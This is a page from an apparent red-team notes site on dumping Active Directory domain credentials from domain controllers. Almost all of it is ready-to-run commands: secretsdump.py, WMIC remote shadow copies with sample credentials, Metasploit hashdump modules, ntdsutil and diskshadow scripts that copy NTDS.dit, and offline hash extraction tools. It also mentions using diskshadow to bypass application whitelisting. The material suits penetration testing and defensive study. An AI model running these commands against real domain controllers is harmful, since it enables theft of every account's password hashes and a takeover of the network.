Gibson> Download Garbage
  • Statement of purpose
  • Techniques
    • Intelligence Gathering
      • O365 Tenant ID
      • Internal domain enumeration
      • O365 email enumeration
      • Passive nmap (smap)
      • Large IP list handling
      • Host Enumeration
    • Initial Access
      • Mail scanning
      • VBA
    • Execution
      • DLL Hijacking
      • Windows LOLBINS
        • DLLs - LOLBIN Execution
        • Executables - LOLBIN Execution
        • Scripts - LOLBIN Execution
    • Privilege Escalation
      • Windows
        • Initial Enumeration
      • Linux
    • Defense Evasion
      • Clear windows event logs
      • Bypassing proxies and firewalls
      • Microsoft Windows Defender
    • Credential Access
      • Extract credentials from LSASS dump
      • Extract credentials from registry hives
      • LSA secrets extraction
      • Dumping LSASS.exe
      • Dumping registry hives
      • Dump the domain (Domain Controllers)
      • Browser cookies & passwords
      • Wi-Fi passwords
      • Clipboard
    • Infrastructure
    • Web application testing
      • XSS - Cross site scripting
        • Weaponising XSS
    • Other
      • Buffer Overflow resources
        • Buffer Overflow Python Template
        • Buffer Overflow Python Fuzzer
      • C Reverse Shell
      • Creating Tiered Storage in Windows 10
      • Default Credentials
    • Red Team Infrastructure
      • Cobalt Strike Team Server
      • Pre-redirector (free domains!)
      • HTTPS Redirector
      • Multi functional WebApp
      • Malleable C2 profiles
      • Gophish Docker reverse proxy
    • Malware
  • Tools
    • Tools
Powered by GitBook
On this page
  • Remote Access
  • Secretsdump.py
  • WMIC & NTDSutil
  • Metasploit
  • Local Access
  • NTDSutil
  • Diskshadow
  • Extracting from NTDS.dit

Was this helpful?

  1. Techniques
  2. Credential Access

Dump the domain (Domain Controllers)

PreviousDumping registry hivesNextBrowser cookies & passwords

Last updated 4 years ago

Was this helpful?

Remote Access

Secretsdump.py

secretsdump -just-dc-ntlm -user-status -o [out_file] [Domain]/[User]@[IP]

WMIC & NTDSutil

from: 

wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c vssadmin create shadow /for=C: 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\temp\ntds.dit 2>&1"
wmic /node:dc /user:PENTESTLAB\David /password:pentestlab123!! process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM\ C:\temp\SYSTEM.hive 2>&1"
copy \\10.0.0.1\c$\temp\ntds.dit C:\temp
copy \\10.0.0.1\c$\temp\SYSTEM.hive C:\temp

Metasploit

auxiliary/admin/smb/psexec_ntdsgrab
windows/gather/credentials/domain_hashdump

Local Access

NTDSutil

Windows binary allows for export of ntds.dit

ntdsutil "activate instance ntds" "ifm" "create full c:\windows\temp\" "quit" "quit"
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Pentest' quit quit"
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\Pentest' q q"

This can then be extracted using secretsdump.py and registry hashes

secretsdump.py -system SYSTEM -security SECURITY -ntds ntds.dit local

Alternatively, additional information can be included such as if accounts are active:

secretsdump.py -system ./SYSTEM -ntds ./ntds.dit  -o ntdis-extract -user-status LOCAL

Then the output can be filtered to remove both disabled and machine accounts:

grep -i "enabled" <secetsdump.py_output.txt> | grep -v "\\$" | sed -e 's! (status=Enabled)!!' $1 > output-filtered.txt

Diskshadow

From Windows server 2008 and later, can use "diskshadow.exe" to copy NTDS.dit.

Create an instruction set for diskshadow.exe to create a new shadow disk copy of the disk C and expose it as drive M:\

shadow.txt
set context persistent nowriters
add volume c: alias someAlias
create
expose %someAlias% M:
exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\temp\ntds.dit
delete shadows volume %someAlias%
reset

Then run:

mkdir c:\temp
diskshadow.exe /s [Path]\shadow.txt  #Needs to be run from System32

Side note: diskshadow can be utilised for whitelisting bypass and process tree obfuscation using the "exec" function.

Extracting from NTDS.dit

Secretsdump.py as described above, or any of the following tools

ntdsdecode
NTDSDumpEx.exe -d ntds.dit -s SYSTEM.hive
./adXtract.sh ./ntds.dit ./SYSTEM.hive

https://adsecurity.org/?p=2398